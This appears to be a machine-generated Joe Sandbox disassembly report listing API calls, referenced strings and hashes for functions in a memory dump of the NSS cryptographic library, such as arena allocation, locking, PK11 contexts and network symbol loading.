                                                                                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,6CEB8E01,00000000,6CEB9060,6CFC0B64), ref: 6CEB8EE5
                                                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,5D8B5657,00000001,?,?,?,?,?,?,?,?,?,?,?,?,6CEB8E01), ref: 6CEB8EFB
                                                                                                                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6CFC0B64,6CFC0B64), ref: 6CEB8F11
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaGrow_Util.NSS3(?,5D8B5657,643D8B08), ref: 6CEB8F3F
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEBA110: PORT_ArenaGrow_Util.NSS3(8514C483,EB2074C0,184D8B3E,?,00000000,00000000,00000000,FFFFFFFF,?,6CEBA421,00000000,00000000,6CEB9826), ref: 6CEBA136
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CEB904A
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      • abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_, xrefs: 6CEB8E76
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: ArenaUtil$Alloc_Grow_memcpystrlen$Errormemchrstrcmp
                                                                                                                                                                                                                                                                                                                      • String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_
                                                                                                                                                                                                                                                                                                                      • API String ID: 977052965-1032500510
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 45238c2233e534c286d30e9393e83bce64a89e36df11c69904ef9a8466934013
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 55f542eccf87139566899a8b5fb08c8157dac325b426ee32c6e90f132c09c0b7
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 45238c2233e534c286d30e9393e83bce64a89e36df11c69904ef9a8466934013
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BB617DB5E0011A9BDB10CF55DD80ABBB7B9EF94358F244129EC28B7700E735A916CAB1
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CE68E5B
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE007,00000000), ref: 6CE68E81
                                                                                                                                                                                                                                                                                                                      • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6CE68EED
                                                                                                                                                                                                                                                                                                                      • SEC_QuickDERDecodeItem_Util.NSS3(?,?,6CF918D0,?), ref: 6CE68F03
                                                                                                                                                                                                                                                                                                                      • PR_CallOnce.NSS3(6CFC2AA4,6CEC12D0), ref: 6CE68F19
                                                                                                                                                                                                                                                                                                                      • PL_FreeArenaPool.NSS3(?), ref: 6CE68F2B
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CE68F53
                                                                                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6CE68F65
                                                                                                                                                                                                                                                                                                                      • PL_FinishArenaPool.NSS3(?), ref: 6CE68FA1
                                                                                                                                                                                                                                                                                                                      • SECITEM_DupItem_Util.NSS3(?), ref: 6CE68FFE
                                                                                                                                                                                                                                                                                                                      • PR_CallOnce.NSS3(6CFC2AA4,6CEC12D0), ref: 6CE69012
                                                                                                                                                                                                                                                                                                                      • PL_FreeArenaPool.NSS3(?), ref: 6CE69024
                                                                                                                                                                                                                                                                                                                      • PL_FinishArenaPool.NSS3(?), ref: 6CE6902C
                                                                                                                                                                                                                                                                                                                      • PORT_DestroyCheapArena.NSS3(?), ref: 6CE6903E
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Arena$Pool$Util$CallErrorFinishFreeItem_Once$Alloc_CheapDecodeDestroyInitQuickmemset
                                                                                                                                                                                                                                                                                                                      • String ID: security
                                                                                                                                                                                                                                                                                                                      • API String ID: 3512696800-3315324353
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 3c8d945a85b961d1cc4ed8e0d4d869c410482b8be7c1fcd90dad381c545cd7d7
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 2e1d9eb6dda6f7da213f04cdf01f1e9f965c40d800e0f73b32d3331c0c083b4d
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3c8d945a85b961d1cc4ed8e0d4d869c410482b8be7c1fcd90dad381c545cd7d7
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E0516B71658300ABE7209A5A9C41FAB73F8AB8774CF24082EF45597F40D732D909C763
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6CF2CC7B), ref: 6CF2CD7A
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF2CE60: PR_LoadLibraryWithFlags.NSS3(?,?,?,?,00000000,?,6CE9C1A8,?), ref: 6CF2CE92
                                                                                                                                                                                                                                                                                                                      • PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6CF2CDA5
                                                                                                                                                                                                                                                                                                                      • PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6CF2CDB8
                                                                                                                                                                                                                                                                                                                      • PR_UnloadLibrary.NSS3(00000000), ref: 6CF2CDDB
                                                                                                                                                                                                                                                                                                                      • PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6CF2CD8E
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE505C0: PR_EnterMonitor.NSS3 ref: 6CE505D1
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE505C0: PR_ExitMonitor.NSS3 ref: 6CE505EA
                                                                                                                                                                                                                                                                                                                      • PR_LoadLibrary.NSS3(wship6.dll), ref: 6CF2CDE8
                                                                                                                                                                                                                                                                                                                      • PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6CF2CDFF
                                                                                                                                                                                                                                                                                                                      • PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6CF2CE16
                                                                                                                                                                                                                                                                                                                      • PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6CF2CE29
                                                                                                                                                                                                                                                                                                                      • PR_UnloadLibrary.NSS3(00000000), ref: 6CF2CE48
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: FindSymbol$Library$Load$MonitorUnload$EnterExitFlagsWith
                                                                                                                                                                                                                                                                                                                      • String ID: freeaddrinfo$getaddrinfo$getnameinfo$ws2_32.dll$wship6.dll
                                                                                                                                                                                                                                                                                                                      • API String ID: 601260978-871931242
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 32632e9d33341857d57fed7533dd64ded958f6c1719529987badf996cf6af5f3
                                                                                                                                                                                                                                                                                                                      • Instruction ID: be8c85096fdb42abaabd0279e8892c5cdfd4baa26ad01567f4165d56f38b7b6f
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 32632e9d33341857d57fed7533dd64ded958f6c1719529987badf996cf6af5f3
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9911D6B6F1251152FF5166F52C01BAB38785F0214CFA84939E815D2F40FB27CA2986E2
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • calloc.MOZGLUE(00000001,00000040,?,?,?,?,?,6CF713BC,?,?,?,6CF71193), ref: 6CF71C6B
                                                                                                                                                                                                                                                                                                                      • PR_NewLock.NSS3(?,6CF71193), ref: 6CF71C7E
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF298D0: calloc.MOZGLUE(00000001,00000084,6CE50936,00000001,?,6CE5102C), ref: 6CF298E5
                                                                                                                                                                                                                                                                                                                      • PR_NewCondVar.NSS3(00000000,?,6CF71193), ref: 6CF71C91
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE4BB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6CE521BC), ref: 6CE4BB8C
                                                                                                                                                                                                                                                                                                                      • PR_NewCondVar.NSS3(00000000,?,?,6CF71193), ref: 6CF71CA7
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE4BB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6CE4BBEB
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE4BB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6CE4BBFB
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE4BB80: GetLastError.KERNEL32 ref: 6CE4BC03
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE4BB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6CE4BC19
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE4BB80: free.MOZGLUE(00000000), ref: 6CE4BC22
                                                                                                                                                                                                                                                                                                                      • PR_NewCondVar.NSS3(00000000,?,?,?,6CF71193), ref: 6CF71CBE
                                                                                                                                                                                                                                                                                                                      • PR_NewCondVar.NSS3(00000000,?,?,?,?,6CF71193), ref: 6CF71CD4
                                                                                                                                                                                                                                                                                                                      • calloc.MOZGLUE(00000001,000000F4,?,?,?,?,?,6CF71193), ref: 6CF71CFE
                                                                                                                                                                                                                                                                                                                      • PR_Lock.NSS3(?,?,?,?,?,?,?,6CF71193), ref: 6CF71D1A
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6CE51A48), ref: 6CF29BB3
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6CE51A48), ref: 6CF29BC8
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,6CF71193), ref: 6CF71D3D
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF0DD70: TlsGetValue.KERNEL32 ref: 6CF0DD8C
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF0DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CF0DDB4
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE890,00000000,?,6CF71193), ref: 6CF71D4E
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE890,00000000,?,?,?,?,?,?,?,6CF71193), ref: 6CF71D64
                                                                                                                                                                                                                                                                                                                      • PR_DestroyCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,6CF71193), ref: 6CF71D6F
                                                                                                                                                                                                                                                                                                                      • PR_DestroyCondVar.NSS3(00000000,?,?,?,?,?,6CF71193), ref: 6CF71D7B
                                                                                                                                                                                                                                                                                                                      • PR_DestroyCondVar.NSS3(?,?,?,?,?,6CF71193), ref: 6CF71D87
                                                                                                                                                                                                                                                                                                                      • PR_DestroyCondVar.NSS3(00000000,?,?,?,6CF71193), ref: 6CF71D93
                                                                                                                                                                                                                                                                                                                      • PR_DestroyLock.NSS3(00000000,?,?,6CF71193), ref: 6CF71D9F
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000,?,6CF71193), ref: 6CF71DA8
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Cond$DestroyError$calloc$CriticalLockSection$Valuefree$CountEnterInitializeLastLeaveSpinUnlock
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 3246495057-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 67929c19657e4183c15f16a9e0fd24707769562783e8d0a1f452dcd93c396e50
                                                                                                                                                                                                                                                                                                                      • Instruction ID: bf0cd00b482474284c9823840a95b8d4caef4c0894ff5cf5d894eae19fa7defe
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 67929c19657e4183c15f16a9e0fd24707769562783e8d0a1f452dcd93c396e50
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 733185F1E007015BEB209F75AD51B5776F8AF05648F148539E84A87B41FB31E518CBA2
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6CE85ECF
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6CE85EE3
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6CE85F0A
                                                                                                                                                                                                                                                                                                                      • PK11_MakeIDFromPubKey.NSS3(00000014), ref: 6CE85FB5
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: CriticalEnterFromK11_MakeSectionUnlockValue
                                                                                                                                                                                                                                                                                                                      • String ID: NSS_USE_DECODED_CKA_EC_POINT$S&l$S&l
                                                                                                                                                                                                                                                                                                                      • API String ID: 2280678669-148785157
                                                                                                                                                                                                                                                                                                                      • Opcode ID: c9a01eebd464319c5f7856c4512e20fe4f7a05c8ba482198aa4144e08fa35ae8
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 1ca27721f927617679bfd80512bafe53c3ced1d6e365aeaffbd83fcb30fe41a9
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c9a01eebd464319c5f7856c4512e20fe4f7a05c8ba482198aa4144e08fa35ae8
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0AF106B5A012158FDB44CF18C984B86BBF4FF09308F6581AAD8089F746D774EA95CF91
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • SECOID_GetAlgorithmTag_Util.NSS3(*,l), ref: 6CED0C81
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEBBE30: SECOID_FindOID_Util.NSS3(6CE7311B,00000000,?,6CE7311B,?), ref: 6CEBBE44
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEA8500: SECOID_GetAlgorithmTag_Util.NSS3(6CEA95DC,00000000,00000000,00000000,?,6CEA95DC,00000000,00000000,?,6CE87F4A,00000000,?,00000000,00000000), ref: 6CEA8517
                                                                                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CED0CC4
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEBFAB0: free.MOZGLUE(?,-00000001,?,?,6CE5F673,00000000,00000000), ref: 6CEBFAC7
                                                                                                                                                                                                                                                                                                                      • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CED0CD5
                                                                                                                                                                                                                                                                                                                      • PORT_ZAlloc_Util.NSS3(0000101C), ref: 6CED0D1D
                                                                                                                                                                                                                                                                                                                      • PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6CED0D3B
                                                                                                                                                                                                                                                                                                                      • PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6CED0D7D
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6CED0DB5
                                                                                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CED0DC1
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6CED0DF7
                                                                                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CED0E05
                                                                                                                                                                                                                                                                                                                      • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CED0E0F
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEA95C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6CE87F4A,00000000,?,00000000,00000000), ref: 6CEA95E0
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEA95C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6CE87F4A,00000000,?,00000000,00000000), ref: 6CEA95F5
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEA95C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6CEA9609
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEA95C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CEA961D
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEA95C0: PK11_GetInternalSlot.NSS3 ref: 6CEA970B
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEA95C0: PK11_FreeSymKey.NSS3(00000000), ref: 6CEA9756
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEA95C0: PK11_GetIVLength.NSS3(?), ref: 6CEA9767
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEA95C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6CEA977E
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEA95C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CEA978E
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
                                                                                                                                                                                                                                                                                                                      • String ID: *,l$*,l$-$l
                                                                                                                                                                                                                                                                                                                      • API String ID: 3136566230-2303401061
                                                                                                                                                                                                                                                                                                                      • Opcode ID: e2aa6e23bf6c81ef40c0d6b3f39ca2125bd2aa962b39c92fb4be6948b031fbcc
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 16d3da26a9cf5445f9240cb245b96d6c12f44b26aad19ddf5cba81df953b6cdc
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e2aa6e23bf6c81ef40c0d6b3f39ca2125bd2aa962b39c92fb4be6948b031fbcc
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7E41F2B5E00205AFEB009F64DC81BAF7674EF4530CF250029E9196B742E735BA15CBE2
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,multiaccess:,0000000C,?,00000000,?,?,6CEC5EC0,00000000,?,?), ref: 6CEC5CBE
                                                                                                                                                                                                                                                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sql:,00000004,?,?,?), ref: 6CEC5CD7
                                                                                                                                                                                                                                                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,extern:,00000007), ref: 6CEC5CF0
                                                                                                                                                                                                                                                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dbm:,00000004), ref: 6CEC5D09
                                                                                                                                                                                                                                                                                                                      • PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE,?,00000000,?,?,6CEC5EC0,00000000,?,?), ref: 6CEC5D1F
                                                                                                                                                                                                                                                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000003,?), ref: 6CEC5D3C
                                                                                                                                                                                                                                                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000006,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CEC5D51
                                                                                                                                                                                                                                                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000003,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CEC5D66
                                                                                                                                                                                                                                                                                                                      • PORT_Strdup_Util.NSS3(?,?,?,?), ref: 6CEC5D80
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: strncmp$SecureStrdup_Util
                                                                                                                                                                                                                                                                                                                      • String ID: NSS_DEFAULT_DB_TYPE$dbm:$extern:$multiaccess:$sql:
                                                                                                                                                                                                                                                                                                                      • API String ID: 1171493939-3017051476
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 45fa3f61e225dfacee7b47b92557fe51d90823264646a8d3791bc7cee5c244ed
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 8adbe5b4bb70e569c90ba60106e211b0e1448c43c8c0d2487d6c88da20b3597e
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 45fa3f61e225dfacee7b47b92557fe51d90823264646a8d3791bc7cee5c244ed
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D131F6A4B43341DBE7401A649DC8F677B78AF0234CF340031FD76A6B81EB62E912D656
                                                                                                                                                                                                                                                                                                                      APIs
